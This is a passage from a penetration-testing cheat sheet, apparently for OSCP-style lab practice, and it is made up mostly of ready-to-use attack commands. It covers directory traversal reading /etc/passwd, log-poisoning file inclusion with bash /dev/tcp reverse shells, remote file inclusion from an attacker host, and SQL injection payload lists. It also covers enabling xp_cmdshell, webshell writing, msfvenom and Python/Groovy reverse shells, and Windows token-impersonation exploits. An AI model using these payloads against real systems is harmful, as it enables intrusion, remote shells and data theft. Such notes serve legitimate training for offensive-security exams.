```bash 892 | #Sometimes it doesn't show if we try path, then we need to encode them 893 | curl http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 894 | ``` 895 | 896 | - Wordpress 897 | - Simple exploit: https://github.com/leonjza/wordpress-shell 898 | 899 | ## Local File Inclusion 900 | 901 | - Main difference between Directory traversal and this attack is, here we’re able to execute commands remotely. 902 | 903 | ```powershell 904 | #At first we need 905 | http://192.168.45.125/index.php?page=../../../../../../../../../var/log/apache2/access.log&cmd=whoami #we're passing a command here 906 | 907 | #Reverse shells 908 | bash -c "bash -i >& /dev/tcp/192.168.119.3/4444 0>&1" 909 | #We can simply pass a reverse shell to the cmd parameter and obtain reverse-shell 910 | bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.3%2F4444%200%3E%261%22 #encoded version of above reverse-shell 911 | 912 | #PHP wrapper 913 | curl "http://mountaindesserts.com/meteor/index.php?page=data://text/plain," 914 | curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resource=/var/www/html/backup.php 915 | ``` 916 | 917 | - Remote file inclusion 918 | 919 | ```powershell 920 | 1. Obtain a php shell 921 | 2. host a file server 922 | 3. 923 | http://mountaindesserts.com/meteor/index.php?page=http://attacker-ip/simple-backdoor.php&cmd=ls 924 | we can also host a php reverseshell and obtain shell. 925 | ``` 926 | 927 | ## SQL Injection 928 | 929 | ```bash 930 | admin' or '1'='1 931 | ' or '1'='1 932 | " or "1"="1 933 | " or "1"="1"-- 934 | " or "1"="1"/* 935 | " or "1"="1"# 936 | " or 1=1 937 | " or 1=1 -- 938 | " or 1=1 - 939 | " or 1=1-- 940 | " or 1=1/* 941 | " or 1=1# 942 | " or 1=1- 943 | ") or "1"="1 944 | ") or "1"="1"-- 945 | ") or "1"="1"/* 946 | ") or "1"="1"# 947 | ") or ("1"="1 948 | ") or ("1"="1"-- 949 | ") or ("1"="1"/* 950 | ") or ("1"="1"# 951 | ) or '1`='1- 952 | ``` 953 | 954 | - Blind SQL Injection - This can be identified by Time-based SQLI 955 | 956 | ```powershell 957 | #Application takes some time to reload, here it is 3 seconds 958 | http://192.168.50.16/blindsqli.php?user=offsec' AND IF (1=1, sleep(3),'false') -- // 959 | ``` 960 | 961 | - Manual Code Execution 962 | 963 | ```bash 964 | kali> impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth #To login 965 | EXECUTE sp_configure 'show advanced options', 1; 966 | RECONFIGURE; 967 | EXECUTE sp_configure 'xp_cmdshell', 1; 968 | RECONFIGURE; 969 | #Now we can run commands 970 | EXECUTE xp_cmdshell 'whoami'; 971 | 972 | #Sometimes we may not have direct access to convert it to RCE from web, then follow below steps 973 | ' UNION SELECT "", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- // #Writing into a new file 974 | #Now we can exploit it 975 | http://192.168.45.285/tmp/webshell.php?cmd=id #Command execution 976 | ``` 977 | 978 | - SQLMap - Automated Code execution 979 | 980 | ```bash 981 | sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user #Testing on parameter names "user", we'll get confirmation 982 | sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump #Dumping database 983 | 984 | #OS Shell 985 | # Obtain the Post request from Burp suite and save it to post.txt 986 | sqlmap -r post.txt -p item --os-shell --web-root "/var/www/html/tmp" #/var/www/html/tmp is the writable folder on target, hence we're writing there 987 | 988 | ``` 989 | 990 | --- 991 | 992 | # Exploitation 993 | 994 | ## Reverse Shells 995 | 996 | ### Msfvenom 997 | 998 | ```bash 999 | msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe 1000 | msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe > shell-x64.exe 1001 | 1002 | msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f asp > shell.asp 1003 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp 1004 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 1005 | msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php 1006 | ``` 1007 | 1008 | ### One Liners 1009 | 1010 | ```bash 1011 | bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 1012 | python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' 1013 | & /dev/tcp/10.11.0.106/443 0>&1');?> 1014 | #For powershell use the encrypted tool that's in Tools folder 1015 | ``` 1016 | 1017 | 1021 | 1022 | ### Groovy reverse-shell 1023 | 1024 | - For Jenkins 1025 | 1026 | ```bash 1027 | String host="localhost"; 1028 | int port=8044; 1029 | String cmd="cmd.exe"; 1030 | Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); 1031 | ``` 1032 | 1033 | --- 1034 | 1035 | # Windows Privilege Escalation 1036 | 1037 | ## Basic 1038 | 1039 | ```bash 1040 | #Starting, Restarting and Stopping services in Powershell 1041 | Start-Service 1042 | Stop-Service 1043 | Restart-Service 1044 | 1045 | #Powershell History 1046 | type C:\Users\sathvik\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 1047 | 1048 | ``` 1049 | 1050 | ## Automated Scripts 1051 | 1052 | ```bash 1053 | winpeas.exe 1054 | winpeas.bat 1055 | Jaws-enum.ps1 1056 | powerup.ps1 1057 | PrivescCheck.ps1 1058 | ``` 1059 | 1060 | ## Token Impersonation 1061 | 1062 | - Command to check `whoami /priv` 1063 | 1064 | ```bash 1065 | #Printspoofer 1066 | PrintSpoofer.exe -i -c powershell.exe 1067 | PrintSpoofer.exe -c "nc.exe -e cmd" 1068 | 1069 | #RoguePotato 1070 | RoguePotato.exe -r -e "shell.exe" -l 9999 1071 | 1072 | #GodPotato 1073 | GodPotato.exe -cmd "cmd /c whoami" 1074 | GodPotato.exe -cmd "shell.exe" 1075 | 1076 | #JuicyPotatoNG 1077 | JuicyPotatoNG.exe -t * -p "shell.exe" -a 1078 | 1079 | #SharpEfsPotato 1080 | SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log" 1081 | #writes whoami command to w.log file 1082 | ``` 1083 | 1084 | ## Services 1085 | 1086 | ### Binary Hijacking 1087 | 1088 | ```bash 1089 | #Identify service from winpeas 1090 | icalcs "path" #F means full permission, we need to check we have full access on folder 1091 | sc qc #find binarypath variable 1092 | sc config